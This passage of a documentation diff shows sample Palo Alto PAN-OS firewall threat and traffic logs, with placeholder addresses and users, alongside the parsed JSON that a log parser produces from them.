null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.103000Z\", \"NSSAINetworkSliceType\": null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-25T21:30:00Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "NL" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "host": { + "name": "DN-EUWEST-F2" + }, + "http": { + "request": { + "method": "unknown" + } + }, + "log": { + "hostname": "DN-EUWEST-F2", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "ssl" + }, + "observer": { + "egress": { + "interface": { + "alias": "OUTSIDE" + } + }, + "ingress": { + "interface": { + "alias": "INSIDE" + } + }, + "product": "PAN-OS", + "serial_number": "000011111112222" + }, + "paloalto": { + "DGHierarchyLevel1": "982", + "DGHierarchyLevel2": "117", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "www.example.org" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ] + }, + "rule": { + "name": "Rule124", + "uuid": "cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 63989 + }, + "port": 51501 + }, + "url": { + "domain": "www.example.org", + "registered_domain": "example.org", + "subdomain": "www", + "top_level_domain": "org" + } + } + + ``` + + +=== "network_threat_alert_2.json" + + ```json + + { + "message": "{\"TimeReceived\": \"2024-06-25T21:30:08.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Global_Internet_Network_Awareness_Service\", \"SourceUser\": \"jdoe@example.org\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"ZR-EUWS-1\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.107\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1787364, \"RepeatCount\": 1, \"SourcePort\": 53610, \"DestinationPort\": 80, \"NATSourcePort\": 36160, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.com/connecttest.txt\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7372845116442397960, \"SourceLocation\": \"10.0.0.0-10.255.255.255\", \"DestinationLocation\": \"US\", \"ContentType\": \"text/plain\", \"PacketID\": 0, \"URLCounter\": 1, \"UserAgent\": \"Microsoft NCSI\", \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 525, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"ZR-EUWS-1\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"get\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \".msftconnecttest.com,computer-and-internet-info,low-risk\", \"RuleUUID\": \"481a523a-44c0-4c37-b2d5-b6b541d775c3\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.778000Z\", \"NSSAINetworkSliceType\": null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-25T21:30:00Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "US" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 80 + }, + "port": 80 + }, + "host": { + "name": "ZR-EUWS-1" + }, + "http": { + "request": { + "method": "get" + } + }, + "log": { + "hostname": "ZR-EUWS-1", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing" + }, + "observer": { + "egress": { + "interface": { + "alias": "untrust" + } + }, + "ingress": { + "interface": { + "alias": "ZR-EUWS-1" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "ContentType": "text/plain", + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "525", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "www.example.com" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "Global_Internet_Network_Awareness_Service", + "uuid": "481a523a-44c0-4c37-b2d5-b6b541d775c3" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 36160 + }, + "port": 53610, + "user": { + "name": "jdoe@example.org" + } + }, + "url": { + "domain": "www.example.com", + "path": "connecttest.txt", + "registered_domain": "example.com", + "subdomain": "www", + "top_level_domain": "com" + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + }, + "user_agent": { + "name": "Microsoft NCSI" + } + } + + ``` + + === "sctp_cef.json" ```json @@ -1208,6 +1472,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "<14>Sep 16 10:00:02 PA-1 1,9/16/19 10:00,1801016000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,0.0.0.0,0.0.0.0,proxy1,,,web-browsing,vsys1234,v10213,zone1,a.1,b.2,Secure,9/16/19 10:00,60000,1,61000,80,0,0,0x0,tcp,allow,800,700,70,2,9/16/19 10:00,0,any,0,50660381839,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,2,1,n/a,0,0,0,0,,PP,from-policy,,,0,,0,,N/A,0,0,0,0", "event": { + "action": "allow", "category": [ "network" ], @@ -1448,6 +1713,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"TimeReceived\": \"2024-02-06T18:17:09.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"file\", \"SubType\": \"file\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-02-06T18:17:02.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"9.10.11.12\", \"NATDestination\": \"5.6.7.8\", \"Rule\": \"Global_Outbound_internet_access\", \"SourceUser\": \"john.doe@example.com\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"trust\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.1\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1450762, \"RepeatCount\": 1, \"SourcePort\": 53514, \"DestinationPort\": 80, \"NATSourcePort\": 22444, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"FileName\": \"some_file_name\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Low\", \"DirectionOfAttack\": \"server to client\", \"SequenceNo\": 7292474944208657622, \"SourceLocation\": \"Prisma-Mobile-Users-EMEA\", \"DestinationLocation\": \"US\", \"PacketID\": 0, \"FileHash\": null, \"ReportID\": 0, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 467, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"GP cloud service\", \"SourceUUID\": null, \"DestinationUUID\": null, \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStartTime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"ContentVersion\": \"577053022\", \"SigFlags\": 0, \"RuleUUID\": \"c38e111b-43fc-4de4-a17c-c372af557193\", \"HTTP2Connection\": 0, \"DynamicUserGroup\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"DomainEDL\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"PartialHash\": 0, \"TimeGeneratedHighResolution\": \"2024-02-06T18:17:02.077000Z\", \"ReasonForDataFilteringAction\": null, \"Justification\": null, \"NSSAINetworkSliceType\": null}", "event": { + "action": "alert", "category": [ "file" ], @@ -1470,6 +1736,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "5.6.7.8", "nat": { + "ip": "5.6.7.8", "port": 80 }, "port": 80 @@ -1514,9 +1781,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "1.2.3.4", - "5.6.7.8" + "5.6.7.8", + "9.10.11.12" ], "user": [ + "example.com", "john.doe@example.com" ] }, @@ -1528,6 +1797,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "address": "1.2.3.4", "ip": "1.2.3.4", "nat": { + "ip": "9.10.11.12", "port": 22444 }, "port": 53514, @@ -1536,7 +1806,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "name": "john.doe@example.com" + "domain": "john.doe", + "email": "john.doe@example.com", + "name": "example.com" } } @@ -1594,7 +1866,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "test.fr\\JDOE" + "JDOE" ] }, "source": { @@ -1604,11 +1876,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ip": "1.2.3.4", "user": { - "name": "test.fr\\JDOE" + "domain": "test.fr", + "name": "JDOE" } }, "user": { - "name": "test.fr\\JDOE" + "domain": "test.fr", + "name": "JDOE" }, "user_agent": { "os": { @@ -2434,6 +2708,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2024/01/12 11:21:15,016201000000,THREAT,url,2562,2024/01/12 11:21:15,1.2.3.4,5.6.7.8,9.10.11.12,0.0.0.0,SAAS vers log,,,ssl,vsys1,Outside,test-Externe,a11.30,a11.25,Panorama,2024/01/12 11:21:15,200000,1,58444,2222,58444,2222,0x50b444,tcp,alert,\"test.fr:9999/\",(9999),test,informational,client-to-server,55555555555555555555,0x8000000000000000,US,France,,,0,,,0,,,,,,,,0,0,0,0,0,,TEST-01,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"test,low-risk\",96eeeef8-bd9c-4145,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-01-12T11:21:15.190+01:00,,,,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no,", "event": { + "action": "alert", "category": [ "network" ], @@ -2459,10 +2734,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "port": 2222 }, - "file": { - "name": "test.fr:9999/", - "path": "test.fr:9999/" - }, "host": { "name": "TEST-01" }, @@ -2488,6 +2759,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "VirtualLocation": "vsys1" }, "related": { + "hosts": [ + "test.fr" + ], "ip": [ "0.0.0.0", "1.2.3.4", @@ -2510,6 +2784,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 58444 }, "port": 58444 + }, + "url": { + "domain": "test.fr", + "port": 9999, + "registered_domain": "test.fr", + "top_level_domain": "fr" } } @@ -2569,6 +2849,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187101,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17635,\"SessionStartTime\": \"2023-02-03T16:46:00.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:46:07.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:46:07.584000Z\",\"TimeReceived\": \"2023-02-03T16:46:14.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}", "event": { + "action": "allow", "category": [ "network" ], @@ -2660,6 +2941,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187100,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17634,\"SessionStartTime\": \"2023-02-03T16:45:44.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:45:52.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.582000Z\",\"TimeReceived\": \"2023-02-03T16:45:56.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}", "event": { + "action": "allow", "category": [ "network" ], @@ -2949,7 +3231,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "test.fr\\JDOE" + "JDOE" ] }, "source": { @@ -2958,7 +3240,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 0 }, "user": { - "name": "test.fr\\JDOE" + "domain": "test.fr", + "name": "JDOE" } } @@ -3080,6 +3363,110 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "threat-url-xff.json" + + ```json + + { + "message": "1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,\"www.sekoia.io:443/catalog/integrations?query=this\",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,\"11.22.33.44\",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"Sekoia,cybertech,low-risk\",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,,,NonProxyTraffic", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "reason": "(9999)", + "type": [ + "info" + ] + }, + "@timestamp": "2024-03-12T14:02:32.650000Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "192.168.0.1", + "ip": "192.168.0.1", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 80 + }, + "host": { + "name": "FW" + }, + "http": { + "request": { + "method": "get" + } + }, + "log": { + "hostname": "FW", + "level": "informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing", + "forwarded_ip": "11.22.33.44", + "transport": "tcp" + }, + "observer": { + "product": "PAN-OS", + "serial_number": "016401004874" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "VirtualLocation": "vsys", + "VirtualSystemName": "VSYS" + }, + "related": { + "hosts": [ + "www.sekoia.io" + ], + "ip": [ + "0.0.0.0", + "10.0.0.2", + "192.168.0.1" + ] + }, + "rule": { + "name": "rule-internet", + "uuid": "ea3431a2-6869-4d9f-ad41-1858d80b406c" + }, + "source": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 49802 + }, + "url": { + "domain": "www.sekoia.io", + "path": "catalog/integrations", + "port": 443, + "query": "query=this", + "registered_domain": "sekoia.io", + "subdomain": "www", + "top_level_domain": "io" + }, + "user_agent": { + "name": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)" + } + } + + ``` + + === "threat_cef.json" ```json @@ -3100,6 +3487,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:48:21Z", + "action": { + "type": "spyware" + }, "destination": { "geo": { "country_iso_code": "BR" @@ -3218,7 +3608,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2021/08/31 14:00:02,001701000000,THREAT,vulnerability,2049,2021/08/31 14:00:02,10.0.0.2,10.2.0.1,0.0.0.0,0.0.0.0,abcd,,,web-browsing,vsys,env,zone2,a1.1,aec.2,podl,2021/08/31 14:00:02,279429,2,12345,80,0,0,0x2000,tcp,alert,\"EXAMPLE.PDF\",PDF Exploit Evasion Found(34805),any,informational,server-to-client,1320000,0x2000000000000000,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,,0,,,1,,,,,,,,0,0,0,0,0,,FW,,,,,0,,0,,N/A,code-execution,AppThreat-0000-1111,0x0,0,422342342,", "event": { - "action": "code-execution", + "action": "alert", "category": [ "vulnerability" ], @@ -3318,6 +3708,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2022-07-31T12:46:24Z", + "action": { + "type": "end" + }, "destination": { "address": "5.6.7.8", "bytes": 5651, @@ -3426,6 +3819,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2022-08-02T06:42:20Z", + "action": { + "type": "end" + }, "destination": { "address": "1.1.1.1", "bytes": 2755, @@ -3538,6 +3934,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-02-27T20:16:21Z", + "action": { + "type": "end" + }, "destination": { "address": "1.1.1.1", "bytes": 400448, @@ -3669,6 +4068,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2024/01/03 13:15:29,026701002040,TRAFFIC,end,2816,2024/01/03 13:15:29,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,MyRule,,,ssl,vsys1,Z_DMZ_PROXY,Z_INTERCO_WAN,ethernet1/22.301,ethernet1/3.104,Log Profile,2024/01/03 13:15:29,219781,1,60975,443,0,0,0x41c,tcp,allow,5773,758,5015,14,2024/01/03 13:15:14,0,not-resolved,,7312415129244589397,0x0,10.0.0.0-10.255.255.255,United States,,7,7,tcp-fin,0,0,0,0,,PA2314-CD,from-policy,,,0,,0,,N/A,0,0,0,0,0bbe5a53-f498-4cc2-a170-ced134f4824c,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2024-01-03T13:15:30.547+01:00,,,encrypted-tunnel,networking,browser-based,4,\\\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,ssl,no,no,0,NonProxyTraffic,", "event": { + "action": "allow", "category": [ "network" ], @@ -3751,6 +4151,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "<14>Sep 16 10:00:00 PA 1,9/16/19 10:00,1801017000,TRAFFIC,deny,2049,9/16/19 10:00,10.0.0.2,1.2.3.4,5.4.4.3,5.4.3.2,DENYALL,,,protection,vsys1,DNS,AAAAA,ae2.503,ethernet1/1,Secure,9/16/19 10:00,11111,1,130000,53,6379,53,0x400000,udp,reset-both,284,284,0,1,9/16/19 10:00,0,any,0,50660381851,0x0,10.0.0.0-10.255.255.255,Spain,0,1,0,policy-deny,0,0,0,0,,PA-1,from-application,,,0,,0,,N/A,0,0,0,0", "event": { + "action": "reset-both", "category": [ "network" ], @@ -3846,6 +4247,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:48:21Z", + "action": { + "type": "url" + }, "destination": { "address": "1.1.1.1", "geo": { @@ -3979,6 +4383,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T21:06:02Z", + "action": { + "type": "logout" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1", @@ -4044,6 +4451,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "{\"TimeReceived\":\"2023-05-30T06:54:42.000000Z\",\"DeviceSN\":\"111111111111\",\"LogType\":\"THREAT\",\"Subtype\":\"wildfire\",\"ConfigVersion\":\"10.1\",\"TimeGenerated\":\"2023-05-30T06:52:13.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"Normal Internet Access browser\",\"SourceUser\":\"john.doe@example.org\",\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/20\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":444444,\"RepeatCount\":1,\"SourcePort\":55555,\"DestinationPort\":80,\"NATSourcePort\":40114,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"block\",\"FileName\":\"mp3.exe\",\"ThreatID\":\"Windows Executable (EXE)(52020)\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"server to 